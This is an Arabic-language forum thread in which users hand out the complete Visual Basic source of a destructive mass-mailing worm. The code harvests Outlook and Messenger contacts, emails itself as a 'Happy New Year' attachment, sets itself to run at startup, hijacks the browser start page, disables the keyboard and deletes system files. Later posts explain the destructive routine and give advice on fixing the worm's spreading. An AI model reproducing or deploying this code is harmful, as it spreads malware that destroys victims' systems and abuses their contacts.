Zacker او reeezak او maldal
اللي يبي كود الفيروس يحط بريده!
واللي مايبي كود الفيروس لايحط بريده!
Zacker او reeezak او maldal
اللي يبي كود الفيروس يحط بريده!
واللي مايبي كود الفيروس لايحط بريده!
السلام عليكم
ممكن تعلمنا الفيروس معمول على اي لغة وتوضح اكثر ايش عمل الفيروس .
وهذا بريدي :
----
الأخوة الكارم .....
ان كان عندكم ما تفيدونا به فضعوه هنا في المنتدى وأما عن طريق الايميل فنحن لا نفضل ذلك وهذا المنتدى للتعليم العلني وليس عن طريق الايميل ..... !!!!!!
أرجو التنبه ... وشكرا
واثق الخطوة يمشي ملكا !!
اتمنى الاشتفاده من الكود وعدم تدمير الناس به
لاني مابي تدمير ولكن ابي تحطيم لاهنتو ;)
بلغة الفيجوال بيسك واللي مسويه واحد اسمه ZaCker
اهم شي في الكود هو كود الاوت لووك لانهم ما اكتشفوه حتى الان
يعني سو فيروس وحط كود الاوت لووك وراح ينشر نفسه
1- ينتقل عن طريق الاوت لووك والدرايف اللي مسوى عليه مشاركه
2-ينتشر عن طريق اي موقع في الجهاز وذلك بعد ان يضع رابط في اي موقع ..لموقع الفيروس اللي راح ينزل الفيروس بمجرد الدخول للسايت
لكن مع الاسف صادو هالثغره قبل امس !!
3-ينشر نفسه عن طريق الميرك بسكربت جديد يخلي اي واحد يدخل التشانل ..يدخل السايت حق الفيروس
للمعلومات عن الفيروس روحو لهالموقع
معلومات عن الفيروس بالكامل :
http://www.f-secure.com/v-descs/cmas.shtml
وهذا هو الكود ياحلوين:
Private Sub Form_Load()
On Error Resume Next
Me.Hide
Set fso = CreateObject("scripting.filesystemobject")
Set wo = fso.getspecialfolder(0)
FileCopy App.Path & "" & App.EXEName & ".exe", wo & "" & "Christmas.exe"
Set MsgrObj = CreateObject("Messenger.MsgrObject")
Set users = MsgrObj.List(0)
For s = 0 To users.Count
If s = 0 Then
temp = temp + users.Item(s).EmailAddress
Else
temp = temp + ";" + users.Item(s).EmailAddress
End If
Next
Set WW = CreateObject("Outlook.Application")
Set HT = WW.GetNameSpace("MAPI").GetDefaultFolder(10).Items
E = HT.Count
ReDim m(E)
For i = 1 To E
E = E - 1
m(E) = HT.Item(i).Email1Address
If i = 1 Then
Mail = m(E)
Else
Mail = Mail + ";" + m(E)
End If
Next
Text1.Text = Mail + ";" + temp
Call snd
End Sub
Sub mout()
On Error Resume Next
Set sss = CreateObject("wscript.shell")
Set fso = CreateObject("scripting.filesystemobject")
Set wo = fso.getspecialfolder(0)
Set so = fso.getspecialfolder(1)
sss.regwrite "HKEY_LOCAL_MACHINESystemCurrentControlSetControlComputerNameComputerNameComputerName", "ZaCker"
sss.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunZacker", wo & "" & "Christmas.exe"
sss.regwrite "HKCUsoftwaremicrosoftinternet Explorermainstart Page", "http://geocities.com/jobreee/ZaCker.htm"
If sss.regread("HKEY_CURRENT_USERSoftwareMicrosoft") <> "5" Then
Me.Show
sss.regwrite "HKEY_CURRENT_USERSoftwareMicrosoft", "5"
Shell (wo & "" & "Christmas.exe")
End If
Shell "rundll32.exe keyboard,disable", vbNormalFocus
Kill (so & "" & "*.*")
End Sub
Sub snd()
On Error Resume Next
Set MLL = CreateObject("Outlook.Application")
Set Uss = MLL.GetNameSpace("MAPI")
Set MMM = MLL.CreateItem(0)
MMM.To = Text1.Text
MMM.Subject = "Happy New Year"
MMM.Body = "Hii" & vbCrLf & "I can't describe my feelings" & vbCrLf & "But all i can say is" & vbCrLf & "Happy New Year :)" & vbCrLf & " bye"
MMM.attachments.Add wo & "" & "Christmas.exe"
MMM.Send
Call mout
End Sub
عن قريب كود فيروس السلام او التصويت Vote@mm
في امان الله
نسيت اقول
تراه ينتقل عن طريق اخذ اي ايميل في المسنجر
وهالحركه جديده استفيدو منها!!
وكلها من بركات هالمنتدى
باااااي
---------
call mout
يعني ارسل نداء للوظيفه mout
اليه عمل الفيروس:
حدث load
وهو حدث التحميل او مايشتغل يجمع العناوين
بعدين يسوي call لوظيفة الارسال
وبعد وظيفة الارسال يسوي call لوظيفة mout
ووظيفة mout هي حقت التدمير
وبس...يعني لوشلته الكلمه call mout ماراح يسوي نداء لها وبذلك الفيروس راح ينتشر ولاهوب مدمر!!
سلام
--------
سلام
اول شي الفيروس راح يجمع الايميلات من دفتر العناوين حق الاوت لووك اكسبرس.
ويجمع عناوين الاشخاص اللي انت مضيفهم في المسنجر.
الفيروس انتشر ولافيه اي مشكله...انا اتوقع ان العيب من عندك ..
احتمالات:
1- يمكن انت مغير نداءات الوظايف
2-او ماسجلت عناوين في الدفتر او ان اعدادات الاوت لووك ..فيها شي!
لانه ينتشر عن طريق الاوت لووك وليس الاوت لووك اكسبرس !
3-حاول تكتشف الخطا بأنك تشيل جملة on error resume next
من رأس الوظيفه الموجود فيها كود الارسال ..مو كود التجميع!
4-انت جرب الكود ثم رح للاوت بوكس حق الاوت لووك ..(البريد الصادر)
ان لقيت فيه شي فاعرف ان الفيروس نشر نفسه والعيب من اعدادات الارسال ..لان الفيروس لما يحط نفسه هناك فهو خلص اللي عليه والباقي اتوقع انه من ملقم الصادر ...:)
في امان الله
هذا الموضوع مغلق.